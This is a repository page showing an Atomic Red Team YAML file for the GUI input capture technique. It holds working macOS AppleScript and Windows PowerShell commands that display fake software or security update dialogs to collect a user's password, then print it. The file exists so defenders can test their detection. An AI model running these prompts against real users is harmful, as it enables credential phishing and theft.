security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1056.002/T1056.002.yaml
T
Atomic Red Team GUID generator 9fcde0a924 Generate GUIDs from job=generate-docs branch=master [skip ci]
2023-10-07 19:07:01 +00:00

41 lines
2.2 KiB
YAML
Raw Permalink Blame History

attack_technique: T1056.002
display_name: 'Input Capture: GUI Input Capture'
atomic_tests:
- name: AppleScript - Prompt User for Password
auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
description: |
Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
supported_platforms:
- macos
executor:
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
description: |
Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
supported_platforms:
- windows
executor:
command: |
# Creates GUI to prompt for password. Expect long pause before prompt is available.
$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
write-warning $cred.GetNetworkCredential().Password
name: powershell
- name: AppleScript - Spoofing a credential prompt using osascript
auto_generated_guid: b7037b89-947a-427a-ba29-e7e9f09bc045
description: |
Prompt user for password without requiring permissions to send Apple events to System Settings.
https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
supported_platforms:
- macos
executor:
command: |
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
echo $PWD_SPOOF
name: bash
Reference in New Issue View Git Blame Copy Permalink